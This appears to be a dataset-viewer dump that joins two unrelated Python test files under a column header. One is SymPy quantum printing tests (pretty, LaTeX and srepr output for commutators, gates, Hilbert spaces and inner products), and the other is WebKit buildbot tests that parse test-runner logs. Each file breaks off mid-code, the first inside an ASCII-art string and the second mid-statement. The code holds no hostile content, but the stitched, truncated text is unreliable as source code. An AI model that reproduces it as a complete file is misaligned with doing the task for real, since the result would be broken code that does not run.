input
stringlengths
2.65k
237k
output
stringclasses
1 value
# -*- encoding: utf-8 -*- """ TODO: * Address Issue 2251, printing of spin states """ from sympy.physics.quantum.anticommutator import AntiCommutator from sympy.physics.quantum.cg import CG, Wigner3j, Wigner6j, Wigner9j from sympy.physics.quantum.commutator import Commutator from sympy.physics.quantum.constants import hbar from sympy.physics.quantum.dagger import Dagger from sympy.physics.quantum.gate import CGate, CNotGate, IdentityGate, UGate, XGate from sympy.physics.quantum.hilbert import ComplexSpace, FockSpace, HilbertSpace, L2 from sympy.physics.quantum.innerproduct import InnerProduct from sympy.physics.quantum.operator import Operator, OuterProduct, DifferentialOperator from sympy.physics.quantum.qexpr import QExpr from sympy.physics.quantum.qubit import Qubit, IntQubit from sympy.physics.quantum.spin import Jz, J2, JzBra, JzBraCoupled, JzKet, JzKetCoupled, Rotation, WignerD from sympy.physics.quantum.state import Bra, Ket, TimeDepBra, TimeDepKet from sympy.physics.quantum.tensorproduct import TensorProduct from sympy.physics.quantum.sho1d import RaisingOp from sympy import Derivative, Function, Interval, Matrix, Pow, S, symbols, Symbol, oo from sympy.core.compatibility import exec_ from sympy.utilities.pytest import XFAIL # Imports used in srepr strings from sympy.physics.quantum.spin import JzOp from sympy.printing import srepr from sympy.printing.pretty import pretty as xpretty from sympy.printing.latex import latex from sympy.core.compatibility import u_decode as u MutableDenseMatrix = Matrix ENV = {} exec_('from sympy import *', ENV) exec_('from sympy.physics.quantum import *', ENV) exec_('from sympy.physics.quantum.cg import *', ENV) exec_('from sympy.physics.quantum.spin import *', ENV) exec_('from sympy.physics.quantum.hilbert import *', ENV) exec_('from sympy.physics.quantum.qubit import *', ENV) exec_('from sympy.physics.quantum.qexpr import *', ENV) exec_('from sympy.physics.quantum.gate import *', ENV) exec_('from sympy.physics.quantum.constants import *', ENV) def sT(expr, string): """ sT := sreprTest from sympy/printing/tests/test_repr.py """ assert srepr(expr) == string assert eval(string, ENV) == expr def pretty(expr): """ASCII pretty-printing""" return xpretty(expr, use_unicode=False, wrap_line=False) def upretty(expr): """Unicode pretty-printing""" return xpretty(expr, use_unicode=True, wrap_line=False) def test_anticommutator(): A = Operator('A') B = Operator('B') ac = AntiCommutator(A, B) ac_tall = AntiCommutator(A**2, B) assert str(ac) == '{A,B}' assert pretty(ac) == '{A,B}' assert upretty(ac) == u'{A,B}' assert latex(ac) == r'\left\{A,B\right\}' sT(ac, "AntiCommutator(Operator(Symbol('A')),Operator(Symbol('B')))") assert str(ac_tall) == '{A**2,B}' ascii_str = \ """\ / 2 \\\n\ <A ,B>\n\ \\ /\ """ ucode_str = \ u("""\ ⎧ 2 ⎫\n\ ⎨A ,B⎬\n\ ⎩ ⎭\ """) assert pretty(ac_tall) == ascii_str assert upretty(ac_tall) == ucode_str assert latex(ac_tall) == r'\left\{A^{2},B\right\}' sT(ac_tall, "AntiCommutator(Pow(Operator(Symbol('A')), Integer(2)),Operator(Symbol('B')))") def test_cg(): cg = CG(1, 2, 3, 4, 5, 6) wigner3j = Wigner3j(1, 2, 3, 4, 5, 6) wigner6j = Wigner6j(1, 2, 3, 4, 5, 6) wigner9j = Wigner9j(1, 2, 3, 4, 5, 6, 7, 8, 9) assert str(cg) == 'CG(1, 2, 3, 4, 5, 6)' ascii_str = \ """\ 5,6 \n\ C \n\ 1,2,3,4\ """ ucode_str = \ u("""\ 5,6 \n\ C \n\ 1,2,3,4\ """) assert pretty(cg) == ascii_str assert upretty(cg) == ucode_str assert latex(cg) == r'C^{5,6}_{1,2,3,4}' sT(cg, "CG(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))") assert str(wigner3j) == 'Wigner3j(1, 2, 3, 4, 5, 6)' ascii_str = \ """\ /1 3 5\\\n\ | |\n\ \\2 4 6/\ """ ucode_str = \ u("""\ ⎛1 3 5⎞\n\ ⎜ ⎟\n\ ⎝2 4 6⎠\ """) assert pretty(wigner3j) == ascii_str assert upretty(wigner3j) == ucode_str assert latex(wigner3j) == \ r'\left(\begin{array}{ccc} 1 & 3 & 5 \\ 2 & 4 & 6 \end{array}\right)' sT(wigner3j, "Wigner3j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))") assert str(wigner6j) == 'Wigner6j(1, 2, 3, 4, 5, 6)' ascii_str = \ """\ /1 2 3\\\n\ < >\n\ \\4 5 6/\ """ ucode_str = \ u("""\ ⎧1 2 3⎫\n\ ⎨ ⎬\n\ ⎩4 5 6⎭\ """) assert pretty(wigner6j) == ascii_str assert upretty(wigner6j) == ucode_str assert latex(wigner6j) == \ r'\left\{\begin{array}{ccc} 1 & 2 & 3 \\ 4 & 5 & 6 \end{array}\right\}' sT(wigner6j, "Wigner6j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))") assert str(wigner9j) == 'Wigner9j(1, 2, 3, 4, 5, 6, 7, 8, 9)' ascii_str = \ """\ /1 2 3\\\n\ | |\n\ <4 5 6>\n\ | |\n\ \\7 8 9/\ """ ucode_str = \ u("""\ ⎧1 2 3⎫\n\ ⎪ ⎪\n\ ⎨4 5 6⎬\n\ ⎪ ⎪\n\ ⎩7 8 9⎭\ """) assert pretty(wigner9j) == ascii_str assert upretty(wigner9j) == ucode_str assert latex(wigner9j) == \ r'\left\{\begin{array}{ccc} 1 & 2 & 3 \\ 4 & 5 & 6 \\ 7 & 8 & 9 \end{array}\right\}' sT(wigner9j, "Wigner9j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6), Integer(7), Integer(8), Integer(9))") def test_commutator(): A = Operator('A') B = Operator('B') c = Commutator(A, B) c_tall = Commutator(A**2, B) assert str(c) == '[A,B]' assert pretty(c) == '[A,B]' assert upretty(c) == u'[A,B]' assert latex(c) == r'\left[A,B\right]' sT(c, "Commutator(Operator(Symbol('A')),Operator(Symbol('B')))") assert str(c_tall) == '[A**2,B]' ascii_str = \ """\ [ 2 ]\n\ [A ,B]\ """ ucode_str = \ u("""\ ⎡ 2 ⎤\n\ ⎣A ,B⎦\ """) assert pretty(c_tall) == ascii_str assert upretty(c_tall) == ucode_str assert latex(c_tall) == r'\left[A^{2},B\right]' sT(c_tall, "Commutator(Pow(Operator(Symbol('A')), Integer(2)),Operator(Symbol('B')))") def test_constants(): assert str(hbar) == 'hbar' assert pretty(hbar) == 'hbar' assert upretty(hbar) == u'ℏ' assert latex(hbar) == r'\hbar' sT(hbar, "HBar()") def test_dagger(): x = symbols('x') expr = Dagger(x) assert str(expr) == 'Dagger(x)' ascii_str = \ """\ +\n\ x \ """ ucode_str = \ u("""\ †\n\ x \ """) assert pretty(expr) == ascii_str assert upretty(expr) == ucode_str assert latex(expr) == r'x^{\dagger}' sT(expr, "Dagger(Symbol('x'))") @XFAIL def test_gate_failing(): a, b, c, d = symbols('a,b,c,d') uMat = Matrix([[a, b], [c, d]]) g = UGate((0,), uMat) assert str(g) == 'U(0)' def test_gate(): a, b, c, d = symbols('a,b,c,d') uMat = Matrix([[a, b], [c, d]]) q = Qubit(1, 0, 1, 0, 1) g1 = IdentityGate(2) g2 = CGate((3, 0), XGate(1)) g3 = CNotGate(1, 0) g4 = UGate((0,), uMat) assert str(g1) == '1(2)' assert pretty(g1) == '1 \n 2' assert upretty(g1) == u'1 \n 2' assert latex(g1) == r'1_{2}' sT(g1, "IdentityGate(Integer(2))") assert str(g1*q) == '1(2)*|10101>' ascii_str = \ """\ 1 *|10101>\n\ 2 \ """ ucode_str = \ u("""\ 1 ⋅❘10101⟩\n\ 2 \ """) assert pretty(g1*q) == ascii_str assert upretty(g1*q) == ucode_str assert latex(g1*q) == r'1_{2} {\left|10101\right\rangle }' sT(g1*q, "Mul(IdentityGate(Integer(2)), Qubit(Integer(1),Integer(0),Integer(1),Integer(0),Integer(1)))") assert str(g2) == 'C((3,0),X(1))' ascii_str = \ """\ C /X \\\n\ 3,0\\ 1/\ """ ucode_str = \ u("""\ C ⎛X ⎞\n\ 3,0⎝ 1⎠\ """) assert pretty(g2) == ascii_str assert upretty(g2) == ucode_str assert latex(g2) == r'C_{3,0}{\left(X_{1}\right)}' sT(g2, "CGate(Tuple(Integer(3), Integer(0)),XGate(Integer(1)))") assert str(g3) == 'CNOT(1,0)' ascii_str = \ """\ CNOT \n\ 1,0\ """ ucode_str = \ u("""\ CNOT \n\ 1,0\ """) assert pretty(g3) == ascii_str assert upretty(g3) == ucode_str assert latex(g3) == r'CNOT_{1,0}' sT(g3, "CNotGate(Integer(1),Integer(0))") ascii_str = \ """\ U \n\ 0\ """ ucode_str = \ u("""\ U \n\ 0\ """) assert str(g4) == \ """\ U((0,),Matrix([\n\ [a, b],\n\ [c, d]]))\ """ assert pretty(g4) == ascii_str assert upretty(g4) == ucode_str assert latex(g4) == r'U_{0}' sT(g4, "UGate(Tuple(Integer(0)),MutableDenseMatrix([[Symbol('a'), Symbol('b')], [Symbol('c'), Symbol('d')]]))") def test_hilbert(): h1 = HilbertSpace() h2 = ComplexSpace(2) h3 = FockSpace() h4 = L2(Interval(0, oo)) assert str(h1) == 'H' assert pretty(h1) == 'H' assert upretty(h1) == u'H' assert latex(h1) == r'\mathcal{H}' sT(h1, "HilbertSpace()") assert str(h2) == 'C(2)' ascii_str = \ """\ 2\n\ C \ """ ucode_str = \ u("""\ 2\n\ C \ """) assert pretty(h2) == ascii_str assert upretty(h2) == ucode_str assert latex(h2) == r'\mathcal{C}^{2}' sT(h2, "ComplexSpace(Integer(2))") assert str(h3) == 'F' assert pretty(h3) == 'F' assert upretty(h3) == u'F' assert latex(h3) == r'\mathcal{F}' sT(h3, "FockSpace()") assert str(h4) == 'L2(Interval(0, oo))' ascii_str = \ """\ 2\n\ L \ """ ucode_str = \ u("""\ 2\n\ L \ """) assert pretty(h4) == ascii_str assert upretty(h4) == ucode_str assert latex(h4) == r'{\mathcal{L}^2}\left( \left[0, \infty\right) \right)' sT(h4, "L2(Interval(Integer(0), oo, false, true))") assert str(h1 + h2) == 'H+C(2)' ascii_str = \ """\ 2\n\ H + C \ """ ucode_str = \ u("""\ 2\n\ H ⊕ C \ """) assert pretty(h1 + h2) == ascii_str assert upretty(h1 + h2) == ucode_str assert latex(h1 + h2) sT(h1 + h2, "DirectSumHilbertSpace(HilbertSpace(),ComplexSpace(Integer(2)))") assert str(h1*h2) == "H*C(2)" ascii_str = \ """\ 2\n\ H x C \ """ ucode_str = \ u("""\ 2\n\ H ⨂ C \ """) assert pretty(h1*h2) == ascii_str assert upretty(h1*h2) == ucode_str assert latex(h1*h2) sT(h1*h2, "TensorProductHilbertSpace(HilbertSpace(),ComplexSpace(Integer(2)))") assert str(h1**2) == 'H**2' ascii_str = \ """\ x2\n\ H \ """ ucode_str = \ u("""\ ⨂2\n\ H \ """) assert pretty(h1**2) == ascii_str assert upretty(h1**2) == ucode_str assert latex(h1**2) == r'{\mathcal{H}}^{\otimes 2}' sT(h1**2, "TensorPowerHilbertSpace(HilbertSpace(),Integer(2))") def test_innerproduct(): x = symbols('x') ip1 = InnerProduct(Bra(), Ket()) ip2 = InnerProduct(TimeDepBra(), TimeDepKet()) ip3 = InnerProduct(JzBra(1, 1), JzKet(1, 1)) ip4 = InnerProduct(JzBraCoupled(1, 1, (1, 1)), JzKetCoupled(1, 1, (1, 1))) ip_tall1 = InnerProduct(Bra(x/2), Ket(x/2)) ip_tall2 = InnerProduct(Bra(x), Ket(x/2)) ip_tall3 = InnerProduct(Bra(x/2), Ket(x)) assert str(ip1) == '<psi|psi>' assert pretty(ip1) == '<psi|psi>' assert upretty(ip1) == u'⟨ψ❘ψ⟩' assert latex( ip1) == r'\left\langle \psi \right. {\left|\psi\right\rangle }' sT(ip1, "InnerProduct(Bra(Symbol('psi')),Ket(Symbol('psi')))") assert str(ip2) == '<psi;t|psi;t>' assert pretty(ip2) == '<psi;t|psi;t>' assert upretty(ip2) == u'⟨ψ;t❘ψ;t⟩' assert latex(ip2) == \ r'\left\langle \psi;t \right. {\left|\psi;t\right\rangle }' sT(ip2, "InnerProduct(TimeDepBra(Symbol('psi'),Symbol('t')),TimeDepKet(Symbol('psi'),Symbol('t')))") assert str(ip3) == "<1,1|1,1>" assert pretty(ip3) == '<1,1|1,1>' assert upretty(ip3) == u'⟨1,1❘1,1⟩' assert latex(ip3) == r'\left\langle 1,1 \right. {\left|1,1\right\rangle }' sT(ip3, "InnerProduct(JzBra(Integer(1),Integer(1)),JzKet(Integer(1),Integer(1)))") assert str(ip4) == "<1,1,j1=1,j2=1|1,1,j1=1,j2=1>" assert pretty(ip4) == '<1,1,j1=1,j2=1|1,1,j1=1,j2=1>' assert upretty(ip4) == u'⟨1,1,j₁=1,j₂=1❘1,1,j₁=1,j₂=1⟩' assert latex(ip4) == \ r'\left\langle 1,1,j_{1}=1,j_{2}=1 \right. {\left|1,1,j_{1}=1,j_{2}=1\right\rangle }' sT(ip4, "InnerProduct(JzBraCoupled(Integer(1),Integer(1),Tuple(Integer(1), Integer(1)),Tuple(Tuple(Integer(1), Integer(2), Integer(1)))),JzKetCoupled(Integer(1),Integer(1),Tuple(Integer(1), Integer(1)),Tuple(Tuple(Integer(1), Integer(2), Integer(1)))))") assert str(ip_tall1) == '<x/2|x/2>' ascii_str = \ """\ / | \\ \n\ / x|x \\\n\ \\ -|- /\n\ \\2|2/ \ """ ucode_str = \ u("""\ ╱ │ ╲ \n\ ╱ x│x ╲\n\ ╲ ─│─ ╱\n\ ╲2│2╱ \ """) assert pretty(ip_tall1) == ascii_str assert upretty(ip_tall1) == ucode_str assert latex(ip_tall1) == \ r'\left\langle \frac{x}{2} \right. {\left|\frac{x}{2}\right\rangle }' sT(ip_tall1, "InnerProduct(Bra(Mul(Rational(1, 2), Symbol('x'))),Ket(Mul(Rational(1, 2), Symbol('x'))))") assert str(ip_tall2) == '<x|x/2>' ascii_str = \ """\ / | \\ \n\ / |x \\\n\ \\ x|- /\n\ \\ |2/ \ """ ucode_str = \ u("""\ ╱ │ ╲ \n\ ╱ │x ╲\n\ ╲ x│─
<reponame>jacadcaps/webkitty<gh_stars>1-10 #! /usr/bin/env python import sys import os import StringIO import unittest import make_passwords_json import json # Show DepricationWarnings come from buildbot - it isn't default with Python 2.7 or newer. # See https://bugs.webkit.org/show_bug.cgi?id=90161 for details. import warnings warnings.simplefilter('default') class BuildBotConfigLoader(object): def _add_webkitpy_to_sys_path(self): # When files are passed to the python interpreter on the command line (e.g. python test.py) __file__ is a relative path. absolute_file_path = os.path.abspath(__file__) webkit_org_config_dir = os.path.dirname(absolute_file_path) build_slave_support_dir = os.path.dirname(webkit_org_config_dir) webkit_tools_dir = os.path.dirname(build_slave_support_dir) scripts_dir = os.path.join(webkit_tools_dir, 'Scripts') sys.path.append(scripts_dir) def _add_dependent_modules_to_sys_modules(self): self._add_webkitpy_to_sys_path() from webkitpy.thirdparty.autoinstalled import buildbot sys.modules['buildbot'] = buildbot class RunWebKitTestsTest(unittest.TestCase): def test_nrwt_leaks_parsing(self): run_webkit_tests = RunWebKitTests() # pylint is confused by the way we import the module ... pylint: disable-msg=E0602 log_text = """ 12:44:24.295 77706 13981 total leaks found for a total of 197,936 bytes. 12:44:24.295 77706 1 unique leaks found. """ expected_incorrect_lines = [ '13981 total leaks found for a total of 197,936 bytes.', '1 unique leaks found.', ] run_webkit_tests._parseRunWebKitTestsOutput(log_text) self.assertEqual(run_webkit_tests.incorrectLayoutLines, expected_incorrect_lines) def test_nrwt_missing_results(self): run_webkit_tests = RunWebKitTests() # pylint is confused by the way we import the module ... pylint: disable-msg=E0602 log_text = """ Expected to fail, but passed: (2) animations/additive-transform-animations.html animations/cross-fade-webkit-mask-box-image.html Unexpected flakiness: text-only failures (2) fast/events/touch/touch-inside-iframe.html [ Failure Pass ] http/tests/inspector-enabled/console-clear-arguments-on-frame-navigation.html [ Failure Pass ] Unexpected flakiness: timeouts (1) svg/text/foreignObject-repaint.xml [ Timeout Pass ] Regressions: Unexpected missing results (1) svg/custom/zero-path-square-cap-rendering2.svg [ Missing ] Regressions: Unexpected text-only failures (1) svg/custom/zero-path-square-cap-rendering2.svg [ Failure ] """ run_webkit_tests._parseRunWebKitTestsOutput(log_text) self.assertEqual(set(run_webkit_tests.incorrectLayoutLines), set(['2 new passes', '3 flakes', '1 missing results', '1 failures'])) class StubStdio(object): def __init__(self, stdio): self._stdio = stdio def getText(self): return self._stdio class StubRemoteCommand(object): def __init__(self, rc, stdio): self.rc = rc self.logs = {'stdio': StubStdio(stdio)} class RunJavaScriptCoreTestsTest(unittest.TestCase): def assertResults(self, expected_result, expected_text, rc, stdio): cmd = StubRemoteCommand(rc, stdio) step = RunJavaScriptCoreTests() step.commandComplete(cmd) actual_results = step.evaluateCommand(cmd) actual_text = step.getText2(cmd, actual_results) self.assertEqual(expected_result, actual_results) self.assertEqual(actual_text, expected_text) def test_no_regressions_old_output(self): self.assertResults(SUCCESS, ["jscore-test"], 0, """Results for Mozilla tests: 0 regressions found. 0 tests fixed. OK.""") def test_no_failure_new_output(self): self.assertResults(SUCCESS, ["jscore-test"], 0, """Results for JSC stress tests: 0 failures found. OK.""") def test_mozilla_failure_old_output(self): self.assertResults(FAILURE, ["1 JSC test failed"], 1, """Results for Mozilla tests: 1 regression found. 0 tests fixed.""") def test_mozilla_failures_old_output(self): self.assertResults(FAILURE, ["2 JSC tests failed"], 1, """Results for Mozilla tests: 2 regressions found. 0 tests fixed.""") def test_jsc_stress_failure_new_output(self): self.assertResults(FAILURE, ["1 JSC test failed"], 1, """Results for JSC stress tests: 1 failure found.""") def test_jsc_stress_failures_new_output(self): self.assertResults(FAILURE, ["5 JSC tests failed"], 1, """Results for JSC stress tests: 5 failures found.""") def test_jsc_stress_failures_with_binary_results_output(self): self.assertResults(FAILURE, ["8 JSC tests failed"], 1, """Results for JSC stress tests: 5 failures found. Results for JSC test binaries: 3 failures found.""") def test_jsc_stress_failures_with_binary_result_output(self): self.assertResults(FAILURE, ["6 JSC tests failed"], 1, """Results for JSC stress tests: 5 failures found. Results for JSC test binaries: 1 failure found.""") class RunTest262TestsTest(unittest.TestCase): def assertResults(self, expected_result, expected_text, rc, stdio): cmd = StubRemoteCommand(rc, stdio) step = RunTest262Tests() step.commandComplete(cmd) actual_results = step.evaluateCommand(cmd) actual_text = step.getText2(cmd, actual_results) self.assertEqual(expected_result, actual_results) self.assertEqual(actual_text, expected_text) def test_no_regressions_output(self): self.assertResults(SUCCESS, ["test262-test"], 0, """ -------------------------Settings------------------------ Test262 Dir: JSTests/test262 JSC: WebKitBuild/Release/jsc DYLD_FRAMEWORK_PATH: WebKitBuild/Release Child Processes: 32 Config file: Tools/Scripts/test262/config.yaml Expectations file: Tools/Scripts/test262/expectations.yaml -------------------------------------------------------- NEW PASS: test/annexB/built-ins/Date/prototype/getYear/length.js (default) NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default) Run with --save to save a new expectations file Saved all the results in Tools/Scripts/test262/results.yaml Summarizing results... See summarized results in Tools/Scripts/test262/results-summary.txt 56071 tests ran 0 expected tests failed 0 tests newly fail 2546 tests newly pass 1241 test files skipped Done in 247 seconds! """) def test_failure_output(self): self.assertResults(FAILURE, ["1 Test262 test failed"], 0, """ -------------------------Settings------------------------ Test262 Dir: JSTests/test262 JSC: WebKitBuild/Release/jsc DYLD_FRAMEWORK_PATH: WebKitBuild/Release Child Processes: 32 Config file: Tools/Scripts/test262/config.yaml Expectations file: Tools/Scripts/test262/expectations.yaml -------------------------------------------------------- ! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (default) NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default) Run with --save to save a new expectations file Saved all the results in Tools/Scripts/test262/results.yaml Summarizing results... See summarized results in Tools/Scripts/test262/results-summary.txt 56071 tests ran 0 expected tests failed 0 tests newly fail 2546 tests newly pass 1241 test files skipped Done in 247 seconds! """) def test_failures_output(self): self.assertResults(FAILURE, ["2 Test262 tests failed"], 0, """ -------------------------Settings------------------------ Test262 Dir: JSTests/test262 JSC: WebKitBuild/Release/jsc DYLD_FRAMEWORK_PATH: WebKitBuild/Release Child Processes: 32 Config file: Tools/Scripts/test262/config.yaml Expectations file: Tools/Scripts/test262/expectations.yaml -------------------------------------------------------- NEW PASS test/language/statements/class/fields-after-same-line-static-async-gen-computed-names.js (default) ! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (default) ! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (strict mode) NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default) Run with --save to save a new expectations file Saved all the results in Tools/Scripts/test262/results.yaml Summarizing results... See summarized results in Tools/Scripts/test262/results-summary.txt 56071 tests ran 0 expected tests failed 0 tests newly fail 2546 tests newly pass 1241 test files skipped Done in 247 seconds! """) class RunLLINTCLoopTestsTest(unittest.TestCase): def assertResults(self, expected_result, expected_text, rc, stdio): cmd = StubRemoteCommand(rc, stdio) step = RunLLINTCLoopTests() step.commandComplete(cmd) actual_results = step.evaluateCommand(cmd) actual_text = step.getText2(cmd, actual_results) self.assertEqual(expected_result, actual_results) self.assertEqual(actual_text, expected_text) def test_failures(self): self.assertResults(FAILURE, ['5 regressions found.'], 1, ' 5 regressions found.') def test_failure(self): self.assertResults(FAILURE, ['1 regression found.'], 1, ' 1 regression found.') def test_no_failure(self): self.assertResults(SUCCESS, ['webkit-jsc-cloop-test'], 0, ' 0 regressions found.') class Run32bitJSCTestsTest(unittest.TestCase): def assertResults(self, expected_result, expected_text, rc, stdio): cmd = StubRemoteCommand(rc, stdio) step = Run32bitJSCTests() step.commandComplete(cmd) actual_results = step.evaluateCommand(cmd) actual_text = step.getText2(cmd, actual_results) self.assertEqual(expected_result, actual_results) self.assertEqual(actual_text, expected_text) def test_failures(self): self.assertResults(FAILURE, ['5 regressions found.'], 1, ' 5 failures found.') def test_failure(self): self.assertResults(FAILURE, ['1 regression found.'], 1, ' 1 failure found.') def test_no_failure(self): self.assertResults(SUCCESS, ['webkit-32bit-jsc-test'], 0, ' 0 failures found.') class RunAPITestsTest(unittest.TestCase): def assertFailures(self, expected_failure_count, stdio): if expected_failure_count: rc = 1 expected_results = FAILURE plural_suffix = "" if expected_failure_count == 1 else "s" expected_text = '%d api test%s failed or timed out' % (expected_failure_count, plural_suffix) else: rc = 0 expected_results = SUCCESS expected_text = 'run-api-tests' cmd = StubRemoteCommand(rc, stdio) step = RunAPITests() step.commandComplete(cmd) actual_results = step.evaluateCommand(cmd) actual_failure_count = step.failedTestCount actual_text = step.getText(cmd, actual_results)[0] self.assertEqual(expected_results, actual_results) self.assertEqual(expected_failure_count, actual_failure_count) self.assertEqual(expected_text, actual_text) def test_no_failures_or_timeouts(self): self.assertFailures(0, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1888 tests of 1888 with 1888 successful ------------------------------ All tests successfully passed! """) def test_no_failures_or_timeouts_with_disabled(self): self.assertFailures(0, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1881 tests of 1888 with 1881 successful ------------------------------ All tests successfully passed! """) def test_one_failure(self): self.assertFailures(1, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1888 tests of 1888 with 1887 successful ------------------------------ Test suite failed Crashed TestWTF.WTF.StringConcatenate_Unsigned **FAIL** WTF.StringConcatenate_Unsigned C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84 Value of: makeString("hello ", static_cast<unsigned short>(42) , " world") Actual: hello 42 world Expected: "hello * world" Which is: 74B00C9C Testing completed, Exit status: 3 """) def test_multiple_failures(self): self.assertFailures(2, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1888 tests of 1888 with 1886 successful ------------------------------ Test suite failed Crashed TestWTF.WTF.StringConcatenate_Unsigned **FAIL** WTF.StringConcatenate_Unsigned C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84 Value of: makeString("hello ", static_cast<unsigned short>(42) , " world") Actual: hello 42 world Expected: "hello * world" Which is: 74B00C9C TestWTF.WTF_Expected.Unexpected **FAIL** WTF_Expected.Unexpected C:\cygwin\home\buildbot\slave\win-release\build\Tools\TestWebKitAPI\Tests\WTF\Expected.cpp:96 Value of: s1 Actual: oops Expected: s0 Which is: oops Testing completed, Exit status: 3 """) def test_one_timeout(self): self.assertFailures(1, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1888 tests of 1888 with 1887 successful ------------------------------ Test suite failed Timeout TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment Testing completed, Exit status: 3 """) def test_multiple_timeouts(self): self.assertFailures(2, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1888 tests of 1888 with 1886 successful ------------------------------ Test suite failed Timeout TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment TestWTF.WTF_Lock.ContendedShortSection Testing completed, Exit status: 3 """) def test_multiple_failures_and_timeouts(self): self.assertFailures(4, """... worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed worker/0 TestWTF.WTF_Variant.Ref Passed worker/0 TestWTF.WTF_Variant.RefPtr Passed worker/0 TestWTF.WTF_Variant.RetainPtr Passed worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed worker/0 exiting Ran 1888 tests of 1888 with 1884 successful ------------------------------ Test suite failed Crashed TestWTF.WTF.StringConcatenate_Unsigned **FAIL** WTF.StringConcatenate_Unsigned C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84 Value of: makeString("hello ", static_cast<unsigned short>(42) , " world") Actual: hello 42 world Expected: "hello * world" Which is: 74B00C9C TestWTF.WTF_Expected.Unexpected **FAIL** WTF_Expected.Unexpected C:\cygwin\home\buildbot\slave\win-release\build\Tools\TestWebKitAPI\Tests\WTF\Expected.cpp:96 Value of: s1 Actual: oops Expected: s0 Which is: oops Timeout TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment TestWTF.WTF_Lock.ContendedShortSection Testing completed, Exit status: 3 """) class SVNMirrorTest(unittest.TestCase): def setUp(self): self.config = json.load(open('config.json')) def get_SVNMirrorFromConfig(self, builderName): SVNMirror = None for builder in self.config['builders']: if builder['name'] == builderName: SVNMirror = builder.pop('SVNMirror', 'https://svn.webkit.org/repository/webkit/') return SVNMirror def test_CheckOutSource(self): # SVN mirror feature isn't unittestable now with source.oldsource.SVN(==source.SVN) , only with source.svn.SVN(==SVN) # https://bugs.webkit.org/show_bug.cgi?id=85887 if issubclass(CheckOutSource, source.SVN): return # Compare CheckOutSource.baseURL with SVNMirror (or with the default URL) in config.json for all builders for builder in c['builders']: for buildStepFactory, kwargs in builder['factory'].steps: if str(buildStepFactory).split('.')[-1] == 'CheckOutSource': CheckOutSourceInstance = buildStepFactory(**kwargs) self.assertEqual(CheckOutSourceInstance.baseURL, self.get_SVNMirrorFromConfig(builder['name'])) class BuildStepsConstructorTest(unittest.TestCase): # "Passing a BuildStep subclass to factory.addStep is deprecated. Please pass a BuildStep instance instead. Support will be dropped in v0.8.7." # It checks if all builder's all buildsteps can be insantiated after migration. # https://bugs.webkit.org/show_bug.cgi?id=89001 # http://buildbot.net/buildbot/docs/0.8.6p1/manual/customization.html#writing-buildstep-constructors @staticmethod def generateTests(): for builderNumber, builder in enumerate(c['builders']): for stepNumber, step in enumerate(builder['factory'].steps): builderName = builder['name'].encode('ascii', 'ignore') setattr(BuildStepsConstructorTest, 'test_builder%02d_step%02d' % (builderNumber, stepNumber), 